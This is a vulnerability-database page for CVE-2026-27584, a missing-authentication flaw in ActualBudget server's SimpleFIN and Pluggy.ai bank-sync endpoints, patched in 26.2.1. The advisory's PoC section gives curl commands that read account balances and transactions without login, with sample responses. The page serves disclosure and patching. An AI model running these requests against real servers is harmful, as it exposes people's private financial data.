Vulnerability-Lookup

CVE-2026-27584 (GCVE-0-2026-27584)

Vulnerability from cvelistv5 – Published: 2026-02-24 14:59 – Updated: 2026-02-24 14:59

Title

ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints

Summary

Actual is a local-first personal finance tool. Prior to version 26.2.1, missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information. This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network. Version 26.2.1 patches the issue.

Severity ?

9.2 (Critical)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	actualbudget	actual	Affected: < 26.2.1

FKIE_CVE-2026-27584

Vulnerability from fkie_nvd - Published: 2026-02-24 15:21 - Updated: 2026-02-24 15:21

Severity ?

9.2 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/actualbudget/actual/commit/ea937d100956ca56689ff852d99c28589e2a7d88
	security-advisories@github.com	https://github.com/actualbudget/actual/security/advisories/GHSA-m2cq-xjgm-f668

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Actual is a local-first personal finance tool. Prior to version 26.2.1, missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information. This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network. Version 26.2.1 patches the issue."
    }
  ],
  "id": "CVE-2026-27584",
  "lastModified": "2026-02-24T15:21:39.010",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.2,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-24T15:21:39.010",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/actualbudget/actual/commit/ea937d100956ca56689ff852d99c28589e2a7d88"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/actualbudget/actual/security/advisories/GHSA-m2cq-xjgm-f668"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-M2CQ-XJGM-F668

Vulnerability from github – Published: 2026-02-24 20:13 – Updated: 2026-02-24 20:13

Summary

ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints

Details

Summary

Missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information.

Impact

This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network.

Details

The ActualBudget server component allows for integration with SimpleFIN and Pluggy.ai services. These services read bank account balances and transaction data from users' banks and return the data to ActualBudget. The affected endpoints facilitate this integration and are intended to be used only by logged in users for the purposes of syncing bank transaction data.

The vulnerable source code is in the following files in the actualbudget/actual GitHub repository (https://github.com/actualbudget/actual/): * /packages/sync-server/src/app-simplefin/app-simplefin.js * /packages/sync-server/src/app-pluggyai/app-pluggyai.js

The sensitive endpoints missing authentication are: * POST /simplefin/status * POST /simplefin/accounts * POST /simplefin/transactions * POST /pluggyai/status * POST /pluggyai/accounts * POST /pluggyai/transactions

The following source code is an example of an integration that implements the authentication middleware (packages/sync-server/src/app-gocardless/app-gocardless.js):

const app = express();
app.use(requestLoggerMiddleware);
...
app.use(express.json());
app.use(validateSessionMiddleware); // <-- Uses authentication

PoC

The below commands exploit this vulnerability on both the SimpleFIN and Pluggy.ai endpoints. No authentication is required. Network access is required.

SimpleFIN:

# Check if SimpleFIN is configured
curl -X POST "https://<actualbudgethost>/simplefin/status"

# List SimpleFIN accounts
curl -X POST "https://<actualbudgethost>/simplefin/accounts"

# List SimpleFIN transactions with an account ID from the previous request
curl -X POST "https://<actualbudgethost>/simplefin/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'

PluggyAI:

# Check if PluggyAI is configured
curl -X POST "https://<actualbudgethost>/pluggyai/status"

# List Pluggy.ai accounts
curl -X POST "https://<actualbudgethost>/pluggyai/accounts"

# List Pluggy.ai transactions with an account ID from the previous request
curl -X POST "https://<actualbudgethost>/pluggyai/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'

Example response from POST /simplefin/accounts:

{
    "status": "ok",
    "data": {
        "accounts": [
            {
                "id": "ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
                "name": "CHEQUING ACCOUNT",
                "currency": "CAD",
                "balance": "1234.56",
                "available-balance": "0.00",
                "balance-date": 1771531758,
                "transactions": [],
                "holdings": [],
                "org": {
                    "domain": "www.cibc.com",
                    "name": "CIBC",
                    "sfin-url": "https://beta-bridge.simplefin.org/simplefin",
                    "url": "https://www.cibconline.cibc.com",
                    "id": "www.cibconline.cibc.com"
                }
            },
            ...
        ]
    }
}

Example response from POST /simplefin/transactions:

{
    "status": "ok",
    "data": {
        "ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX": {
            "balances": [
                {
                    "balanceAmount": {
                        "amount": "1234.56",
                        "currency": "CAD"
                    },
                    "balanceType": "expected",
                    "referenceDate": "2026-02-19"
                },
                {
                    "balanceAmount": {
                        "amount": "1234.56",
                        "currency": "CAD"
                    },
                    "balanceType": "interimAvailable",
                    "referenceDate": "2026-02-19"
                }
            ],
            "startingBalance": 123456,
            "transactions": {
                "all": [
                    {
                        "booked": true,
                        "sortOrder": 1771502400,
                        "date": "2026-02-19",
                        "payeeName": "E-Transfer",
                        "notes": "SEND E-TFR ***ABC",
                        "transactionAmount": {
                            "amount": "-12.00",
                            "currency": "USD"
                        },
                        "transactionId": "TRN-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
                        "transactedDate": "2026-02-19",
                        "postedDate": "2026-02-19"
                    },
                    ...
                ],
                "pending": []
            }
        }
    }
}

Severity ?

9.2 (Critical)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@actual-app/sync-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27584"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T20:13:30Z",
    "nvd_published_at": "2026-02-24T15:21:39Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nMissing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information.\n\n### Impact\n\nThis vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network.\n\n### Details\n\nThe ActualBudget server component allows for integration with SimpleFIN and Pluggy.ai services. These services read bank account balances and transaction data from users\u0027 banks and return the data to ActualBudget. The affected endpoints facilitate this integration and are intended to be used only by logged in users for the purposes of syncing bank transaction data.\n\nThe vulnerable source code is in the following files in the `actualbudget/actual` GitHub repository (https://github.com/actualbudget/actual/):\n* `/packages/sync-server/src/app-simplefin/app-simplefin.js`\n* `/packages/sync-server/src/app-pluggyai/app-pluggyai.js`\n\nThe sensitive endpoints missing authentication are:\n* `POST /simplefin/status`\n* `POST /simplefin/accounts`\n* `POST /simplefin/transactions`\n* `POST /pluggyai/status`\n* `POST /pluggyai/accounts`\n* `POST /pluggyai/transactions`\n\nThe following source code is an example of an integration that implements the authentication middleware (`packages/sync-server/src/app-gocardless/app-gocardless.js`):\n```js\nconst app = express();\napp.use(requestLoggerMiddleware);\n...\napp.use(express.json());\napp.use(validateSessionMiddleware); // \u003c-- Uses authentication\n```\n\n\n### PoC\n\nThe below commands exploit this vulnerability on both the SimpleFIN and Pluggy.ai endpoints. No authentication is required. Network access is required.\n\nSimpleFIN:\n```bash\n# Check if SimpleFIN is configured\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/status\"\n\n# List SimpleFIN accounts\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/accounts\"\n\n# List SimpleFIN transactions with an account ID from the previous request\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/transactions\" -H \"Content-Type: application/json\" -d \u0027{\"accountId\":[\"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"],\"startDate\":[\"2026-02-01\"]}\u0027\n```\n\nPluggyAI:\n```bash\n# Check if PluggyAI is configured\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/status\"\n\n# List Pluggy.ai accounts\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/accounts\"\n\n# List Pluggy.ai transactions with an account ID from the previous request\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/transactions\" -H \"Content-Type: application/json\" -d \u0027{\"accountId\":[\"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"],\"startDate\":[\"2026-02-01\"]}\u0027\n```\n\nExample response from `POST /simplefin/accounts`:\n```json\n{\n    \"status\": \"ok\",\n    \"data\": {\n        \"accounts\": [\n            {\n                \"id\": \"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n                \"name\": \"CHEQUING ACCOUNT\",\n                \"currency\": \"CAD\",\n                \"balance\": \"1234.56\",\n                \"available-balance\": \"0.00\",\n                \"balance-date\": 1771531758,\n                \"transactions\": [],\n                \"holdings\": [],\n                \"org\": {\n                    \"domain\": \"www.cibc.com\",\n                    \"name\": \"CIBC\",\n                    \"sfin-url\": \"https://beta-bridge.simplefin.org/simplefin\",\n                    \"url\": \"https://www.cibconline.cibc.com\",\n                    \"id\": \"www.cibconline.cibc.com\"\n                }\n            },\n            ...\n        ]\n    }\n}\n```\n\nExample response from `POST /simplefin/transactions`:\n```json\n{\n    \"status\": \"ok\",\n    \"data\": {\n        \"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\": {\n            \"balances\": [\n                {\n                    \"balanceAmount\": {\n                        \"amount\": \"1234.56\",\n                        \"currency\": \"CAD\"\n                    },\n                    \"balanceType\": \"expected\",\n                    \"referenceDate\": \"2026-02-19\"\n                },\n                {\n                    \"balanceAmount\": {\n                        \"amount\": \"1234.56\",\n                        \"currency\": \"CAD\"\n                    },\n                    \"balanceType\": \"interimAvailable\",\n                    \"referenceDate\": \"2026-02-19\"\n                }\n            ],\n            \"startingBalance\": 123456,\n            \"transactions\": {\n                \"all\": [\n                    {\n                        \"booked\": true,\n                        \"sortOrder\": 1771502400,\n                        \"date\": \"2026-02-19\",\n                        \"payeeName\": \"E-Transfer\",\n                        \"notes\": \"SEND E-TFR ***ABC\",\n                        \"transactionAmount\": {\n                            \"amount\": \"-12.00\",\n                            \"currency\": \"USD\"\n                        },\n                        \"transactionId\": \"TRN-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n                        \"transactedDate\": \"2026-02-19\",\n                        \"postedDate\": \"2026-02-19\"\n                    },\n                    ...\n                ],\n                \"pending\": []\n            }\n        }\n    }\n}\n```",
  "id": "GHSA-m2cq-xjgm-f668",
  "modified": "2026-02-24T20:13:30Z",
  "published": "2026-02-24T20:13:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/actualbudget/actual/security/advisories/GHSA-m2cq-xjgm-f668"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27584"
    },
    {
      "type": "WEB",
      "url": "https://github.com/actualbudget/actual/commit/ea937d100956ca56689ff852d99c28589e2a7d88"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/actualbudget/actual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27584 (GCVE-0-2026-27584)

FKIE_CVE-2026-27584

GHSA-M2CQ-XJGM-F668

Summary

Impact

Details

PoC

Tags

Sightings

Nomenclature